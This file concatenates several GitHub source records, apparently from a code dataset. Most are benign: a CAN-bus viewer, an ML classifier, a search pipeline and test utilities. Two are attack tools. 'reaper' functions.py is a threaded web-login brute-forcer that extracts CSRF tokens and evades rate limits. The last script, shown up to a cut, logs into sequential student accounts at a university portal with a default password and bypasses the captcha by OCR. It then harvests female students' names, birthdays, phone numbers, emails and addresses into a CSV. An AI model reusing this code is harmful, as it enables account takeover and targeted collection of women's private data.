self.maxMessages = 256\n self.lock = threading.RLock()\n self.lock.acquire()\n self.sortBy = None\n self.sortAscending = False\n\n self.bottomMenu = BottomMenu(curses.newwin(1, curses.COLS, curses.LINES - 2, 0), self)\n self.messagesPad = MessagesPad(curses.newpad(self.maxMessages, curses.COLS - 2), 1, 0, curses.LINES - 3, curses.COLS - 2, self)\n self.messagesHeader = MessagesHeader(curses.newwin(1, curses.COLS, 0, 0), self)\n curses.init_pair(self.COLOR_MENU_SHORTCUT, curses.COLOR_WHITE, curses.COLOR_BLACK)\n curses.init_pair(self.COLOR_MENU_DESC, curses.COLOR_BLACK, curses.COLOR_CYAN)\n curses.init_pair(self.COLOR_HEADER, curses.COLOR_BLACK, curses.COLOR_GREEN)\n curses.init_pair(self.COLOR_MSG, curses.COLOR_WHITE, curses.COLOR_BLACK)\n curses.init_pair(self.COLOR_MSG_HILIGHT_OLD, curses.COLOR_RED, curses.COLOR_BLACK)\n curses.init_pair(self.COLOR_MSG_HILIGHT, curses.COLOR_BLACK, curses.COLOR_RED)\n\n self.lock.release()\n\n\n def redraw(self):\n self.lock.acquire()\n self.bottomMenu.redraw()\n self.messagesHeader.redraw()\n self.messagesPad.redraw()\n self.lock.release()\n\n def addMessage(self, message):\n self.lock.acquire()\n self.messagesPad.addMessage(message)\n self.lock.release()\n\n def nextSort(self):\n if self.sortBy is None:\n self.sortBy = 0\n else:\n self.sortBy += 1\n\n if self.sortBy >= len(self.visibleColumns):\n self.sortAscending = not self.sortAscending\n self.sortBy = 0\n\n self.messagesPad.setSort(self.visibleColumns[self.sortBy], self.sortAscending)\n self.messagesHeader.setSort(self.visibleColumns[self.sortBy], self.sortAscending)\n\n\ndef canReaderThread(can_interface, tui):\n for message in can.interface.Bus(channel = can_interface, bustype = bustype):\n tui.addMessage(message)\n\n\ndef canReader(can_interface):\n for message in can.interface.Bus(channel = can_interface, bustype = bustype):\n print(message)\n\n\n\n\ndef main():\n if len(sys.argv) < 2 or sys.argv[1] is None:\n print(\"Usage: {} \".format(sys.argv[0]))\n return\n# canReader(sys.argv[1])\n curses.wrapper(cursesMain)\n\n\n\ndef cursesMain(stdscr):\n curses.noecho()\n curses.cbreak()\n stdscr.keypad(True)\n stdscr.timeout(0)\n run = True\n\n tui = TUI()\n\n canThread = threading.Thread(target = canReaderThread, args=(sys.argv[1], tui, ))\n canThread.start()\n\n stdscr.refresh()\n tui.redraw()\n while run:\n tui.lock.acquire()\n k = stdscr.getch()\n tui.lock.release()\n\n if k == curses.KEY_F10:\n run = False\n elif k == curses.KEY_F5:\n tui.messagesPad.window.clear()\n elif k == curses.KEY_F6:\n tui.nextSort()\n elif k == curses.KEY_F8:\n tui.messagesPad.clear()\n \n elif k == curses.KEY_UP:\n if tui.messagesPad.yOffset >= 1:\n tui.messagesPad.yOffset -= 1\n if k == curses.KEY_DOWN:\n tui.messagesPad.yOffset += 1\n tui.redraw()\n time.sleep(0.01)\n\n canThread.join()\n\n\n\nmain()\n","repo_name":"Mrkvak/cx30-can","sub_path":"scripts/canview.py","file_name":"canview.py","file_ext":"py","file_size_in_byte":13637,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"40208701008","text":"from torch import nn\nfrom models.pretrain.vae import Encoder\n\n\nclass VAEZClassifier(nn.Module):\n\n def __init__(self, n_classes=1000):\n super(VAEZClassifier,self).__init__()\n\n self.encoder = Encoder()\n\n self.fc1 = nn.Linear(self.encoder.z_dim, 512)\n self.relu = nn.ReLU()\n self.drop = nn.Dropout(0.2)\n self.fc2 = nn.Linear(512, n_classes)\n self.lsm = nn.LogSoftmax(dim=1)\n\n def forward(self ,x):\n # bs x 16 x 88 x 88\n z, mu, logvar = self.encoder(x)\n\n x = self.fc1(z)\n x = self.relu(x)\n x = self.drop(x)\n x = self.fc2(x)\n x = self.lsm(x)\n return x\n\n # If our particular model needs to do anything special to transform the image we can specify it here\n # will need to copy this over to eval.py if we do anything special\n transform = Encoder.transform\n\n\n","repo_name":"settonull/zoc-ssic","sub_path":"models/classifier/vae_z_classifier.py","file_name":"vae_z_classifier.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30805652740","text":"# encontrar el segundo valor mas grande de un arreglo\r\n\r\n# se crea una lista\r\nlista = [10, 2, 24, 37, 847, 36, 10, 92]\r\n# se define un numero mayor, en este caso, la posicion 0 del arreglo\r\nmayor = lista[0]\r\n# se define un segundo numero mayor que tambien sera en la posicion 0\r\nmayordos = lista[0]\r\n# Ahora realizamos un ciclo for para iterar sobre cada uno de los espacios en el arreglo y comparamos si el numero en\r\n# esa posicion es mayor que la variable mayor, lo reemplazamos, esto solo para tener como referencia un numero mayor\r\n# y poder proseguir con la comparacion del segundo numero\r\nfor i in lista:\r\n if i > mayor:\r\n mayor = i\r\n# ahora creamos un segundo ciclo para verificar un numero que sea menor al numero mayor, pero que sea mayor al\r\n# numero que estemos iterando, en este caso iniciamos con el numero en la posicion 0, que es 10. y vamos reemplazando\r\n# el valor de \"mayordos\".\r\nfor i in lista:\r\n if i < mayor and i > mayordos:\r\n mayordos = i\r\n# por ultimo imprimimos el segundo numero mayor, en este caso yo imprimi los dos\r\nprint(\"el numero mayor del arreglo es: {} y el segundo numero mayor es: {}\".format(mayor, mayordos))\r\n\r\n#","repo_name":"mastergamer1309/trabajosUni","sub_path":"Python/pruebas.py","file_name":"pruebas.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1120752296","text":"from lib.operationJson import operetionJson\nfrom lib.getRandomData import RandomNumber\nimport re\nclass openrationDict:\n \"\"\"\n 这是一个解析dict参数的类,\n 可用于多参数的指定key,指定key集合解析key,更新指定key的值\n \"\"\"\n def __init__(self):\n self.oj=operetionJson()\n self.rn=RandomNumber()\n def get_value(self,my_dict,key):\n \"\"\"\n 这是一个递归函数\n :param my_dict: 传入的字典\n :param key: 字典中的key\n :return:返回字典中某个key对应的值\n \"\"\"\n try:\n if isinstance(my_dict,dict):\n if my_dict.get(key)or my_dict.get(key)==0 or my_dict.get(key)==''\\\n and my_dict.get(key) is False:\n return my_dict.get(key)\n for my_dict_key in my_dict:\n if self.get_value(my_dict.get(my_dict_key),key)or\\\n self.get_value(my_dict.get(my_dict_key),key)is False:\n return self.get_value(my_dict.get(my_dict_key),key)\n if isinstance(my_dict,list):\n for my_dict_arr in my_dict:\n if self.get_value(my_dict_arr,key)\\\n or self.get_value(my_dict_arr,key)is False:\n return self.get_value(my_dict_arr,key)\n except Exception as el:\n print(el)\n def get_response_date(self,res,extract_data):\n \"\"\"\n 通过响应数据中的key,获取value并写入json文件\n :param res: 接口返回数据\n :param extract_data: 要提取的数据\n :return:返回一个字典\n \"\"\"\n if isinstance(extract_data,str):\n extract_data=eval(extract_data)\n for key,extract_content in extract_data .items():\n global write_dict\n key_list=[]\n value_list=[]\n if key==\"extractBody\":\n for key ,value in extract_content.items():\n key_list.append(value)\n value_list.append(self.get_value(res,key))\n print(\"获取提取字段:{0},提取值:{1}\".format(key, self.get_value(res,key)))\n write_dict = dict(zip(key_list, value_list))\n print(\"写入.json文件成功,写入字段:{0},写入值:{1}\".format(value, self.get_value(res, key)))\n self.oj.write_data(write_dict)#写入json文件\n def update_request_data(self,api_dict):\n \"\"\"\n\n :param api_dict:原有请求入参\n :return:更新的的入参\n \"\"\"\n extract_dict = re.findall(r\"[$]{(.+?)}\", str(api_dict))\n if len(extract_dict) > 0:\n for key in range(len(extract_dict)):\n extract_dict_key = extract_dict[key]\n old = \"${\" + extract_dict_key + \"}\"\n if \"random\" in extract_dict_key:\n random_id = extract_dict_key.split(\"_\")[1]\n new = self.rn.getRandomDate(random_id)\n api_dict = eval(str(api_dict).replace(old, str(new)))\n else:\n new = self.oj.get_data(extract_dict_key)\n api_dict = eval(str(api_dict).replace(old, str(new)))\n return api_dict","repo_name":"13717888314/TestAutoJzh","sub_path":"lib/operationDict.py","file_name":"operationDict.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29598187001","text":"import os\nimport re\nimport hnswlib\nimport pathlib\nimport logging\nimport traceback\nimport numpy as np\nimport pandas as pd\nimport textdistance\nfrom sentence_transformers import SentenceTransformer, util\n\n\nlogging.basicConfig(level=logging.INFO)\n\n\nclass SearchDescriptionPipeline:\n \"\"\" Search Engine Pipeline \"\"\"\n def __init__(self, \n semantic_search_topk:int=10,\n keyword_search_topk:int=2,\n embedding_model_name:str='all-mpnet-base-v2', \n hardware_device='cpu') -> None:\n \n self.description_text = \"\"\n self.embedding_size = 768\n self.semantic_search_top_k = semantic_search_topk\n self.keyword_search_top_k = keyword_search_topk\n self.keyword_similarity_threshold = 0.85\n self.embedding_model_name = embedding_model_name\n self.hardware_device = hardware_device\n self.current_directory = pathlib.Path().resolve()\n self.description_dataset_path = os.path.join(self.current_directory, 'superhero_desc_updated.gzip')\n self.hnsw_index_path = os.path.join(self.current_directory, 'hnswlib.index')\n \n logging.info(f'Loading Artifacts ...')\n \n # check if the following files available:\n for item in [self.description_dataset_path, self.hnsw_index_path]:\n if not os.path.exists(item):\n logging.error(f'File: {item} Not Found in the location. Please check!')\n \n # Load the necessary artifacts:\n self.description_data = pd.read_parquet(self.description_dataset_path)\n self.hnsw_index = hnswlib.Index(space = 'cosine', dim = self.embedding_size)\n \n logging.info(f'Dataset Exists: {os.path.exists(self.description_dataset_path)}\\nHNSW Index Exists: {os.path.exists(self.hnsw_index_path)}')\n \n logging.info(\"Loading HNSW index for Semantic Search\")\n self.hnsw_index.load_index(self.hnsw_index_path)\n \n logging.info(f'Loaded HNSW Index. Now Setting EFT')\n \n # Controlling the recall by setting ef:\n # ef should always be > top_k_hits\n self.hnsw_index.set_ef(50)\n \n logging.info(\"Loading Embedding Model for Vectorisation\")\n self.embedding_model = SentenceTransformer(self.embedding_model_name, \n device=self.hardware_device)\n \n logging.info(f'Done!')\n \n \n def text_similarity(self, keyword:str, text_token:str) -> int:\n # Compute text similarity between keyword and description word token\n sim = textdistance.ratcliff_obershelp.normalized_similarity(keyword, text_token)\n return 1 if sim >= self.keyword_similarity_threshold else 0\n \n \n def tokenisation(self, text:str) -> list:\n # Clean words and tokenise the text\n text = re.sub(' ', '-', text)\n text = text.split(',')\n clean_text = []\n for token in text:\n if token.startswith('-'):\n clean_text.append(token.replace('-', ''))\n else:\n clean_text.append(token)\n text = re.sub('-', ' ', \" \".join(clean_text))\n return text.split(' ')\n \n \n def run_semantic_search(self) -> list:\n \n # Perform semantic search and get the document ids\n \n inp_hero_des_embedding = self.embedding_model.encode(self.description_text)\n corpus_ids, distances = self.hnsw_index.knn_query(inp_hero_des_embedding, \n k=self.semantic_search_top_k)\n \n hits = [{'corpus_id': id, 'score': 1-score} for id, score in zip(corpus_ids[0], distances[0])]\n hits = sorted(hits, key=lambda x: x['score'], reverse=True)\n \n doc_ids = []\n for hit in hits[0:self.semantic_search_top_k]:\n doc_ids.append(hit['corpus_id'])\n return doc_ids\n \n \n def run_keyword_search(self, doc_ids:list) -> list:\n # Build a dictionary which has {'document id': Number of keywords present}\n \n freq_score_board = {}\n \n input_desc_keywords = self.description_text.split(',')\n \n # take a input description keyword and search it in the exiting description dataset\n \n for row_index in doc_ids:\n des_doc = self.description_data.iloc[row_index]['hero_description']\n des_doc_tokens = self.tokenisation(des_doc)\n bit_arry = []\n for key in input_desc_keywords:\n for des_doc_token in des_doc_tokens:\n bit_arry.append(self.text_similarity(keyword=key, text_token=des_doc_token))\n \n freq_score_board[row_index] = sum(bit_arry)\n \n sorted_freq = {k: v for k, v in sorted(freq_score_board.items(), \n key=lambda item: item[1], reverse=True)}\n \n superhero_names = []\n for index, doc_id in enumerate(sorted_freq.keys()):\n if index >= self.keyword_search_top_k:\n break\n superhero_names.append(self.description_data.iloc[doc_id]['hero_name'])\n return superhero_names\n \n \n def run_pipeline(self, description_text: str) -> list:\n self.description_text = description_text.lower()\n document_ids = self.run_semantic_search()\n result = self.run_keyword_search(doc_ids = document_ids)\n return result\n \n\nif __name__ == '__main__':\n # device = mps for Apple M1 Macs\n search_pipeline = SearchDescriptionPipeline(hardware_device='cpu')\n input_dec = 'marvel comics, male, hero, spider powers, new york city, super strength, durability, enhanced senses'\n superhero_guess = search_pipeline.run_pipeline(description_text=input_dec)\n print(f'Input Description: {input_dec}\\nGuess: {superhero_guess}')\n ","repo_name":"RahulNenavath/Guess-The-Hero","sub_path":"Code/src/search_pipeline.py","file_name":"search_pipeline.py","file_ext":"py","file_size_in_byte":5893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24492190404","text":"import sys,requests,re,time,os,threading,queue\nfrom bs4 import BeautifulSoup as Soup\n\n#---variables---\nthreads = []\nt = 0\ncreds_index = 1\nlock = threading.Lock()\nevent = threading.Event()\n\n#set the flag to true\nevent.set()\n\nclass mythread (threading.Thread):\n\t#initialize mythread subclass\n\tdef __init__(self, name, Q, urlQ, number_of_tries, time_to_sleep, save, second_way, page, threadlist, parameters_list):\n\t\t#invoke the base class (Thread) constructor\n\t\tthreading.Thread.__init__(self)\n\t\tself.Q = Q\n\t\tself.urlQ = urlQ\n\t\tself.number_of_tries = number_of_tries\n\t\tself.time_to_sleep = time_to_sleep\n\t\tself.save = save\n\t\tself.second_way = second_way\n\t\tself.page = page\n\t\tself.threadlist = threadlist\n\t\tself.parameters_list = parameters_list\n\t#the functions that each thread runs when started\n\tdef run(self):\n\t\tprint(self.name, \"started\")\n\t\t#call the process function\n\t\tprocess(self.name, self.Q, self.urlQ, self.number_of_tries, self.time_to_sleep, self.save, self.second_way, self.page, self.parameters_list)\n\t\tprint(\"Exit\", self.name)\n\t\t#append the thread which finished to the threads list\n\t\tthreads.append(self.name)\n\t\t#call the finish function\n\t\tfinish(self.threadlist, self.save)\n\ndef process(threadName, Q, urlQ, number_of_tries, time_to_sleep, save, second_way, page, parameters_list):\n\t#check if the Q queue is empty---\n\twhile not Q.empty():\n\t\t#---if there are more than 1 url in the urlQ---\n\t\tif urlQ.qsize() > 1:\n\t\t\t#get a url from the urlQ\n\t\t\turl = urlQ.get()\n\t\t\t#do for every item in the parameters list\n\t\t\tfor i in parameters_list:\n\t\t\t\t#check if sleeping is set\n\t\t\t\tif time_to_sleep != 0:\n\t\t\t\t\t#check if the thread should sleep\n\t\t\t\t\tif parameters_list.index(i) != 0 and parameters_list.index(i) % int(number_of_tries) == 0:\n\t\t\t\t\t\tprint(threadName, \"sleeping for\", time_to_sleep, \"seconds\")\n\t\t\t\t\t\ttime.sleep(int(time_to_sleep))\n\t\t\t\t\t\tprint(threadName, \"awake\")\n\t\t\t\tprint(threadName, \"processing item %s url: %s\" % (parameters_list.index(i) + 1, url))\n\t\t\t\t#call the parametersfunc function\n\t\t\t\tparametersfunc(threadName, i, url, save, second_way, page)\n\t\t#---if there is one url in the urlQ---\n\t\telse:\n\t\t\tif urlQ.qsize() == 1:\n\t\t\t\t#get the url from the urlQ\n\t\t\t\turl = urlQ.get()\n\t\t\t\t#put url back in urlQ so other threads can use it\n\t\t\t\turlQ.put(url)\n\t\t\t#check if sleeping is set\n\t\t\tif time_to_sleep != 0:\n\t\t\t\t#lock here so the other threads can't continue and have to wait for your sleep\n\t\t\t\tlock.acquire()\n\t\t\t\tglobal t\n\t\t\t\t#check if the thread should sleep\n\t\t\t\tif t != 0 and t % int(number_of_tries) == 0:\n\t\t\t\t\t#check if Q is empty so not to sleep unnecessarily\n\t\t\t\t\tif Q.empty():\n\t\t\t\t\t\tlock.release()\n\t\t\t\t\t\treturn\n\t\t\t\t\tt += 1\n\t\t\t\t\tprint(threadName, \"sleeping for\", time_to_sleep, \"seconds\")\n\t\t\t\t\ttime.sleep(int(time_to_sleep))\n\t\t\t\t\tprint(threadName, \"awake\")\n\t\t\t\t\tlock.release()\n\t\t\t\telse:\n\t\t\t\t\tt += 1\n\t\t\t\t\tlock.release()\n\t\t\t#wait until the flag is true (if true return immediately)\n\t\t\tevent.wait()\n\t\t\t#set the flag to false so that the other threads wait for this thread to check if Q is empty\n\t\t\tevent.clear()\n\t\t\t#check again if Q is empty\n\t\t\tif Q.empty():\n\t\t\t\t#set the flag to true so the other threads can continue\n\t\t\t\tevent.set()\n\t\t\t\t#return from the function\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\t#get the parameters from the Q\n\t\t\t\tparameters = Q.get()\n\t\t\t#set the flag to true so the other threads can continue\n\t\t\tevent.set()\n\t\t\tglobal creds_index\n\t\t\tprint(threadName, \"processing item %s url: %s\" % (creds_index, url))\n\t\t\tcreds_index += 1\n\t\t\t#call the parametersfunc function\n\t\t\tparametersfunc(threadName, parameters, url, save, second_way, page)\n\ndef parametersfunc(threadName, p, url, save, second_way, page):\n\t#set some variables\n\tparameters = {}\n\t#make the parameters a list\n\tparameters_list = p.split(\"/\")\n\t#make parameters list a dictionary (needed from the requests module)\n\tfor i in range(0,len(parameters_list)):\n\t\tpara = parameters_list[i].split(\"=\")\n\t\tparameters[para[0]] = para[1]\n\t#make a url get request to get the cookies and the csrf token\n\treq = requests.get(url)\n\t#extract the cookies\n\tcookie = req.cookies\n\t#extract the csrf token and add it to parameters\n\t#if the csrf token is embedded in the HTML:\n\tfor key, value in parameters.items():\n\t\tif value == \"TOKEN\":\n\t\t\thtml = req.text\n\t\t\tsoup = Soup(html, 'lxml')\n\t\t\ttry:\n\t\t\t\tcsrf_token = soup.find_all(attrs={ \"name\" : key })[0].get('value')\n\t\t\texcept IndexError:\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\t#replace TOKEN with the csrf_token\n\t\t\t\tparameters[key] = csrf_token\n\t#if the csrf token is in a script:\n\tfor key, value in parameters.items():\n\t\tif value == \"SCRIPT\":\n\t\t\thtml = req.text\n\t\t\tcsrf_token = \"\"\n\t\t\ttry:\n\t\t\t\t#search the html text for the csrf_token\n\t\t\t\tre.search(key + \".*?value.*?=.*?\\w.*?;\", html)\n\t\t\texcept IndexError:\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\t#find all accounts of csrf_token in the html text (there might be more than one if\n\t\t\t\t#the site has included more as comments)\n\t\t\t\tcsrf_token1 = re.findall(key + \".*?value.*?=.*?\\w.*?;\", html)\n\t\t\t\t#if there are comments to fool Reaper\n\t\t\t\tif len(csrf_token1) > 1:\n\t\t\t\t\t#make a second get request\n\t\t\t\t\treq = requests.get(url)\n\t\t\t\t\t#extract the cookies again cause they change with each request\n\t\t\t\t\tcookie = req.cookies\n\t\t\t\t\thtml = req.text\n\t\t\t\t\t#find all the accounts of csrf_token in the html text again\n\t\t\t\t\tcsrf_token2 = re.findall(key + \".*?value.*?=.*?\\w.*?;\", html)\n\t\t\t\t\t#cross-check the results and remove those which are the same\n\t\t\t\t\tfor i in csrf_token1:\n\t\t\t\t\t\tfor j in csrf_token2:\n\t\t\t\t\t\t\tif i == j:\n\t\t\t\t\t\t\t\tcsrf_token1.remove(i)\n\t\t\t\t#token should be a list with 2 items (the csrf_token is included in the 2nd item)\n\t\t\t\ttoken = str(csrf_token1).split(\"=\")\n\t\t\t\ttry:\n\t\t\t\t\ttoken[1]\n\t\t\t\texcept IndexError:\n\t\t\t\t\treturn\n\t\t\t\telse:\n\t\t\t\t\t#get only the alphanumeric characters from the token\n\t\t\t\t\tfor i in token[1]:\n\t\t\t\t\t\tif i.isalnum():\n\t\t\t\t\t\t\tcsrf_token += i\n\t\t\t\t#replace TOKEN with the csrf_token\n\t\t\t\tparameters[key] = csrf_token\n\trequest(url, cookie, parameters, page, second_way, save)\n\ndef request(url, cookie, parameters, page, second_way, save):\n\t#make the post request and parse the results\n\treq = requests.post(url, cookies=cookie, data=parameters)\n\t#find and write into a file any successful attempts\n\t#second_way: check if the same parameters exist in the page served after the request\n\tif second_way != 0:\n\t\thtml = req.text\n\t\tsoup = Soup(html, 'lxml')\n\t\tfor key, value in parameters.items():\n\t\t\ttry:\n\t\t\t\tsoup.find_all(attrs={ \"name\" : key })[0]\n\t\t\texcept IndexError:\n\t\t\t\tprint (\"Found valid credentials: %s , %s\" % (url, parameters))\n\t\t\t\tglobal pas2\n\t\t\t\t#write the successful attempts in the file\n\t\t\t\tpas2 = open(save,'a')\n\t\t\t\tpas2.write('%s\\n' % (parameters))\n\t\t\t\tpas2.close()\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\treturn\n\t#default way: check the url of the page served after the request\n\tif req.url == (url + \"/\") or req.url == url or req.url == page:\n\t\tpass\n\telse:\n\t\tprint (\"Found valid credentials: %s , %s\" % (url, parameters))\n\t\tglobal pas\n\t\t#write the successful attempts in the file\n\t\tpas = open(save,'a')\n\t\tpas.write('%s\\n' %(parameters))\n\t\tpas.close()\n\ndef finish(threadlist, save):\n\t#check if all the threads finished\n\tif len(threads) == len(threadlist):\n\t\tprint(\"All threads exited\")\n\t\ttry:\n\t\t\tpas\n\t\texcept NameError:\n\t\t\ttry:\n\t\t\t\tpas2\n\t\t\texcept NameError:\n\t\t\t\tprint(\"No valid credentials found\")\n\t\t\telse:\n\t\t\t\tprint('The valid credentials have been stored to ' + save)\n\t\telse:\n\t\t\tprint('The valid credentials have been stored to ' + save)\n","repo_name":"konsaranto/reaper","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":7370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"41965265632","text":"import uuid\nfrom functools import lru_cache\nfrom typing import Optional\n\nfrom services.base import BaseSearch\nfrom services.cache import cache\nfrom services.elastic import Elastic\nfrom services.service_utils import get_offset\n\nfrom fastapi.params import Depends\n\n\nclass GenreService:\n def __init__(self, search: BaseSearch):\n self.search = search\n\n @cache\n async def get_genres(self, size: int, page: int) -> Optional[list[dict]]:\n offset = get_offset(page, size)\n res = await self.search.search(index='genres', size=size, offset=offset)\n print('### get_genres:\\n', res)\n return res\n\n @cache\n async def get_genres_search(self, search_query: str, size: int, page: int) -> Optional[list[dict]]:\n offset = get_offset(page, size)\n res = await self.search.search(index='genres', size=size, offset=offset, search_query=search_query)\n return res\n\n @cache\n async def get_genre(self, genre_id: uuid.UUID) -> Optional[dict]:\n res = await self.search.get(index=\"genres\", id=str(genre_id))\n return res\n\n\n@lru_cache()\ndef get_genre_service(\n search: BaseSearch = Depends(Elastic), # type: ignore\n) -> GenreService:\n return GenreService(search)\n","repo_name":"baramba/yap_fastapi","sub_path":"app/services/genres.py","file_name":"genres.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33285254332","text":"import RPi.GPIO as GPIO\nimport time\n\nLED1 = 7\t#the pin number of the LED to blink\nLED2 = 8\t#the pin number of the LED to blink\n\ndef main():\n\t# to use Pi cobbler pin numbers\n\tGPIO.setmode(GPIO.BCM)\n\n\t# set up GPIO output channel\n\tGPIO.setup(LED1, GPIO.OUT)\n\tGPIO.setup(LED2, GPIO.OUT)\n\n\t# blink 3 times\n\tfor i in range(0,3):\n\t\tblink(LED1)\n\t\tblink(LED2)\n\n\tGPIO.cleanup() \n\n# blinking function\ndef blink(pin):\n GPIO.output(pin,GPIO.HIGH)\n time.sleep(1)\n GPIO.output(pin,GPIO.LOW)\n time.sleep(1)\n return\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"scottbateman/pei-energy-feedback-thingy","sub_path":"lib/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"32338966126","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n\"\"\"\n@author: Jiong.L\n@time: 2023/2/5 11:53\n\"\"\"\n# -*- coding:utf-8 -*-\nimport sys\nimport time\n\nimport pandas as pd\nimport requests\nimport re\nimport js2py\nimport base64\nimport pickle\nimport os\nimport threading\n\n\nclass NoProblem(BaseException):\n def __init__(self, message=None):\n self.message = message\n\n\nclass Ouchn(object):\n def __init__(self, userCode, userPwd, tmplist):\n\n try:\n if userCode in tmplist:\n now_time = int(time.time())\n with open(f'./tmp/{userCode}', 'rb') as f:\n last_time, name, last_session = pickle.load(f)\n if now_time - last_time < 7200:\n self.session = last_session\n self.name = name\n self.loignStatus = True\n else:\n raise NoProblem('111')\n else:\n raise NoProblem('111')\n except NoProblem:\n self.session = requests.Session()\n self.session.headers.update({\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70 \"\n })\n self.name = None\n self.userCode = userCode\n self.verify_code = None\n self.random_key = None\n self.get_login_page()\n self.userdata = self.encode_data([str(userCode), str(userPwd)])\n self.verifyCode()\n self.login()\n\n def get_login_page(self):\n url = 'https://iam.pt.ouchn.cn/am/UI/Login?realm=%2F&service=initService&goto=https%3A%2F%2Fiam.pt.ouchn.cn' \\\n '%2Fam%2Foauth2%2Fauthorize%3Fservice%3DinitService%26response_type%3Dcode%26client_id' \\\n '%3D345fcbaf076a4f8a%26scope%3Dall%26redirect_uri%3Dhttps%253A%252F%252Fmenhu.pt.ouchn.cn%252Fouchnapp' \\\n '%252Fwap%252Flogin%252Findex%26decision%3DAllow '\n\n req = self.session.get(url)\n if req.status_code == 200:\n regex1 = r\"(?<=name=\\\"random\\\".value=\\\").+(?=\\\")\"\n matches1 = re.search(regex1, req.text).group()\n self.random_key = matches1\n\n regex2 = r\"(?<=name=\\\"SunQueryParamsString\\\".value=\\\").+(?=\\\")\"\n self.sunQueryParamsString = re.search(regex2, req.text).group()\n\n regex3 = r\"(?<=name=\\\"goto\\\".value=\\\").+(?=\\\")\"\n self.goto = re.search(regex3, req.text).group()\n\n def encode_data(self, codes: list):\n def read_json(file_name):\n with open(file_name, 'r', encoding='UTF-8') as file:\n result = file.read()\n return result\n\n js = read_json(\"./des.js\")\n test = js2py.EvalJs()\n test.execute(js)\n result = []\n for i in codes:\n result.append(test.strEnc(i, self.random_key))\n return result\n\n def verifyCode(self):\n url = 'https://iam.pt.ouchn.cn/am/validate.code'\n verify_url = 'https://iam.pt.ouchn.cn/am/validatecode/verify.do'\n req = self.session.get(url)\n if req.status_code == 200:\n code_ocr = requests.post('http://152.67.249.191:9898/ocr/b64/text',\n data=base64.b64encode(req.content).decode())\n if code_ocr.status_code == 200:\n # print(code_ocr.text)\n code_verify = self.session.post(verify_url, data={'validateCode': code_ocr.text}).json()\n if code_verify['state'] == 'success':\n self.verify_code = code_ocr.text\n else:\n for i in range(5):\n self.verifyCode()\n else:\n return False\n\n def login(self):\n login_url = 'https://iam.pt.ouchn.cn/am/UI/Login'\n data = {\n 'IDToken1': self.userdata[0],\n 'IDToken2': self.userdata[1],\n # 'IDToken1': 'CCCE346E53115CC3B426804C6667F4FE0F65C21D6AF7FEFD2885E0A94909A9AD',\n # 'IDToken2': 'A48351D40F533D4A917A84E2D216C4F7D1A467D82C34A970',\n 'IDToken3': self.verify_code,\n 'goto': self.goto,\n 'gotoOnFail': '',\n 'SunQueryParamsString': self.sunQueryParamsString,\n 'encoded': 'true',\n 'gx_charset': 'UTF-8'\n }\n login_req = self.session.post(login_url, data=data)\n try:\n name_req = self.session.post('https://menhu.pt.ouchn.cn/ouchnapp/wap/user/get-info').json()\n self.name = name_req[\"d\"][\"base\"][\"realname\"]\n except requests.exceptions.JSONDecodeError:\n self.loignStatus = False\n return False\n if login_req.status_code == 200:\n self.tpl_write()\n self.loignStatus = True\n else:\n self.loignStatus = False\n\n def get_data(self):\n test_url = 'https://menhu.pt.ouchn.cn/ouchnproj/wap/xueji/index'\n req: dict = self.session.post(test_url).json()\n if 'm' in req.keys() and req['m'] == \"操作成功\":\n data: dict = req['d']['list'][0]\n else:\n return False\n if data['xbm'] == '女':\n mm_info = {\n '学号': data['xh'],\n '姓名': data['xm'],\n '生日': data['csrq'],\n '电话': data['sjh'],\n '邮箱': data['dzyx'],\n '地址': data['txdzxxdz']\n }\n else:\n return False\n\n return mm_info\n\n def tpl_write(self):\n now = int(time.time())\n with open(f'./tmp/{self.userCode}', 'wb') as f:\n pickle.dump([now, self.name, self.session], f)\n pass\n\n\ndef init():\n if 'tmp' in os.listdir('./'):\n return os.listdir('./tmp')\n else:\n os.mkdir('./tmp')\n init()\n\n\nif __name__ == '__main__':\n print('*' * 30 + '请耐心等待' + '*' * 30)\n print('示意:2251001204320')\n start_nums = int(input('请输入开始账号'))\n end_nums = int(input('请输入需要爬取的数量'))\n thread_nums = int(input('请输入线程数'))\n tmp_list = init()\n list1 = [i for i in range(start_nums, start_nums + end_nums)]\n\n mm_list = []\n\n\n def threading_test(**kwargs):\n ouchn = Ouchn(kwargs['username'], kwargs['password'], tmp_list)\n if ouchn.loignStatus:\n data = ouchn.get_data()\n if data:\n print(data)\n mm_list.append(data)\n\n else:\n print(f'{kwargs[\"username\"]}账号或密码错误')\n\n\n obj = {}\n for i in range(len(list1)):\n obj[i]: threading.Thread = threading.Thread(target=threading_test,\n kwargs={'tmplist': tmp_list, 'username': list1[i],\n 'password': 'Ouchn@2021'})\n obj[i].start()\n obj[i].join()\n while True:\n if len(threading.enumerate()) < 1 + thread_nums:\n break\n\n df = pd.DataFrame(columns=['学号', '姓名', '生日', '电话', '邮箱', '地址'])\n for i in range(len(mm_list)):\n df.loc[i] = mm_list[i]\n if 'girl.csv' in os.listdir('./'):\n df.to_csv('./girl.csv', 